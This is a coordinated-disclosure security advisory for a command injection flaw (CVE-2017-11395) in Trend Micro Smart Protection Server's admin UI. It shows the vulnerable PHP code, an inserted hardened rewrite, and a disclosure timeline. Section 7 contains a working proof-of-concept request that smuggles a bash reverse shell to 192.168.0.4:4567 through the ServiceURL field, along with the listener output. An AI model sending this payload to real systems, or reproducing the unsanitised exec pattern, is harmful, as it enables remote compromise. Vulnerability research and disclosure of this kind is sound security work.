Trend Micro Smart Protection OS Command Injection

1. Advisory Information

Title: Trend Micro Smart Protection OS Command Injection
Advisory ID: CORE-2017-0004
Advisory URL: http://www.coresecurity.com/core-labs/advisories/trend-micro-smart-protection-os-command-injection
Date published: 2017-08-23
Date of last update: 2017-08-23
Vendors contacted: Trend Micro
Release mode: Coordinated release

2. Vulnerability Information

Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-11395

3. Vulnerability Description

Trend Micro's website states that:

Trend Micro Smart Protection Server [1] is a next-generation, in-the-cloud based, advanced protection solution. At the core of this solution is an advanced scanning architecture that leverages malware prevention signatures that are stored in-the-cloud. This solution leverages file reputation and web reputation technology to detect security risks. The technology works by offloading a large number of malware prevention signatures and lists that were previously stored on endpoints to Trend Micro Smart Protection Server.

A command injection vulnerability was found in the Smart Protection Server Administration UI. In particular, the cm_agent.php script did not sanitize input parameters before executing a system command.

4. Vulnerable Packages

  • Trend Micro Smart Protection Server 3.1 (Critical Patch - Build 1030 applied)

Other products and versions might be affected, but they were not tested.

5. Vendor Information, Solutions and Workarounds

Trend Micro published the following Security Notes:

  • https://success.trendmicro.com/solution/en-US/1117933.aspx

6. Credits

This vulnerability was discovered and researched by Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team.

7. Technical Description / Proof of Concept Code

[CVE-2017-11395] The vulnerable function is SOSubscription, which is located in the /var/www/AdminUI/php/cm_agent.php script. This functionality can be reached only by authenticated users, so the attacker would first need to obtain a valid session via some other means (such as XSS).

As can be seen below, the $serviceurl and $apikey variables are read from the $data['Settings'] array, concatenated unmodified into the command string, and passed to the exec function.

 function SOSubscription($data) {
     $res = Array('errcode'=>'423','response'=>'ERR','message'=>'');
     $res['success_ok'] = '0';
     //auto-deploy information from TMCM
     $serviceurl = $data['Settings']['SO_SubscriptionSetting']['ServiceURL'];
     $apikey = $data['Settings']['SO_SubscriptionSetting']['APIKey'];
     if(!$serviceurl || !apikey) {
         echo json_encode($res);
         return;
     }
     // ccca register command
     $tmpdata = array();
     $ret = 0;
     $reg_cmd = LWCSCTRL_CMD." -c CCCA_REGISTER -u ".$serviceurl." -a ".$apikey;
     exec($reg_cmd, $tmpdata, $ret);
     [...]

Reading through the script a bit more shows that the array is built from the JSON-decoded body of the POST request without any sanitization of its contents.

 if (isset($argv)){
     [...]
 } else{
     // remote access need to check session
     require_once('inc/ajax_authsession.php');
     SessionChecker::CheckAndRedirect();
     $type = $_POST['T'];
     $postJsondata = $_POST['data'];
     #$filename="/var/tmcss/debuglogs/wsi_debug_T".$_POST['T'].".txt";
     #file_put_contents($filename, $_POST['data']);
 }
 $postdata = json_decode($postJsondata, true);
 // type must exist
 if (strlen($type) == 0) {
     OutputError(ERR_TYPE_NOT_EXIST);
     return;
 }
 if (!is_numeric($type)) $type = -1;
 switch ($type) {
     [...]
     case TYPE_SO_SUBSCRIPTION:
         SOSubscription($postdata);
         break;
     default:
         OutputError(ERR_TYPE_INVALID);
         break;
 }
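The following hardened rewrite of SOSubscription is an added example for illustration, not Trend Micro's code or its actual patch. It keeps the command shape from the listing above, assumes LWCSCTRL_CMD is the constant used there (defined here with a placeholder path), and shows the two layers a fix needs: positive validation of the values and shell quoting of every argument.

```php
<?php
// Added example, not Trend Micro's code: a hardened rewrite of the
// SOSubscription pattern shown above. LWCSCTRL_CMD is assumed to be the
// constant the original script uses; the path here is a placeholder.
define('LWCSCTRL_CMD', '/placeholder/path/to/lwcsctrl');

// Returns array('serviceurl'=>..., 'apikey'=>...) or null if either is bad.
function validateSubscriptionSettings(array $data) {
    if (!isset($data['Settings']['SO_SubscriptionSetting'])) {
        return null;
    }
    $s = $data['Settings']['SO_SubscriptionSetting'];
    $serviceurl = isset($s['ServiceURL']) ? $s['ServiceURL'] : '';
    $apikey     = isset($s['APIKey'])     ? $s['APIKey']     : '';
    // Positive validation: must parse as an http(s) URL. The PoC payload has
    // no scheme or host and fails here, but a valid URL may still carry ';'
    // or '&' in its path or query, so this is defence in depth, not the fix.
    if (!is_string($serviceurl)
        || filter_var($serviceurl, FILTER_VALIDATE_URL) === false
        || !in_array(strtolower((string) parse_url($serviceurl, PHP_URL_SCHEME)),
                     array('http', 'https'), true)) {
        return null;
    }
    // API key: allow only the character set the backend needs.
    if (!is_string($apikey) || !preg_match('/\A[A-Za-z0-9._-]{1,128}\z/', $apikey)) {
        return null;
    }
    return array('serviceurl' => $serviceurl, 'apikey' => $apikey);
}

// The actual fix: each argument goes through escapeshellarg(), which wraps it
// in single quotes so the shell treats metacharacters as literal text.
function buildRegisterCommand(array $v) {
    return LWCSCTRL_CMD . ' -c CCCA_REGISTER'
         . ' -u ' . escapeshellarg($v['serviceurl'])
         . ' -a ' . escapeshellarg($v['apikey']);
}
function SOSubscriptionHardened(array $data) {
    $res = array('errcode' => '423', 'response' => 'ERR', 'message' => '');
    $v = validateSubscriptionSettings($data);
    if ($v === null) {
        $res['message'] = 'invalid ServiceURL or APIKey';
        echo json_encode($res);
        return false;
    }
    $tmpdata = array();
    $ret = 0;
    exec(buildRegisterCommand($v), $tmpdata, $ret);
    return $ret === 0;
}
```

With the PoC value from this advisory, validateSubscriptionSettings() returns null and exec() is never reached; even if validation were bypassed, escapeshellarg() would pass the whole string to lwcsctrl as a single literal argument.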

The following proof of concept injects a command in the ServiceURL POST parameter and opens a reverse shell to 192.168.0.4:4567.

 POST /php/cm_agent.php HTTP/1.1
 Host: 192.168.32.132:4343
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Cookie: 0913293ac171fc7c=qdi24p124q7p5n9mg34ej2sq66;
 Connection: close
 Upgrade-Insecure-Requests: 1
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 156

 sid=0913293ac171fc7c&T=105&data={"Settings":{"SO_SubscriptionSetting":{"ServiceURL":"%3bbash+-i+>%26+/dev/tcp/192.168.0.4/4567+0>%261%3b", "APIKey":"123"}}}

 caja:~ maxi$ nc -lv 4567
 bash: no job control in this shell
 bash-3.2$ id
 uid=501(webserv) gid=501(webserv) groups=101(icrc),501(webserv)

8. Report Timeline

  • 2017-05-23: Core Security sent an initial notification to Trend Micro, including a draft advisory.
  • 2017-05-23: Trend Micro confirmed receipt of the advisory and said they would submit it to the relevant technical team for validation and replication.
  • 2017-06-07: Core Security asked for an update on the reported vulnerability.
  • 2017-06-07: Trend Micro answered that, due to the imminent release of Smart Protection Server 3.2, it was uncertain whether this vulnerability would be addressed in v3.2 or in a separate patch.
  • 2017-06-12: Core Security replied asking for a more concrete schedule for fixing this vulnerability, which was still unclear three weeks after it was reported.
  • 2017-06-14: Trend Micro answered that the vulnerability had been confirmed and a hotfix should be available within the week, to be released as a critical patch; there was no ETA yet for public download availability.
  • 2017-06-19: Core Security acknowledged the information and thanked Trend Micro for the update.
  • 2017-06-23: Trend Micro reported they were in the process of creating the official critical patch and would let us know once the official release date was defined.
  • 2017-06-27: Core Security acknowledged the information and thanked Trend Micro for the update.
  • 2017-08-09: Trend Micro reported they already had the patch for the reported vulnerability and asked to discuss coordinated disclosure of the advisory (proposing Wednesday the 16th). Trend Micro also provided the CVE-ID for this vulnerability.
  • 2017-08-10: Core Security thanked Trend Micro for the update and proposed Wednesday the 23rd as a tentative publication date, pending internal review.
  • 2017-08-16: Core Security confirmed Wednesday the 23rd as the coordinated release date and asked for the official download link to include in the advisory.
  • 2017-08-16: Trend Micro sent us their advisory link to be included in our advisory.
  • 2017-08-23: Advisory CORE-2017-0004 published.

9. References

[1] https://www.trendmicro.com/en_ca/business/technologies/smart-protection-network.html

10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: https://www.coresecurity.com/core-labs

11. About Core Security

Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia.

12. Disclaimer

The contents of this advisory are copyright (c) 2017 Core Security and (c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/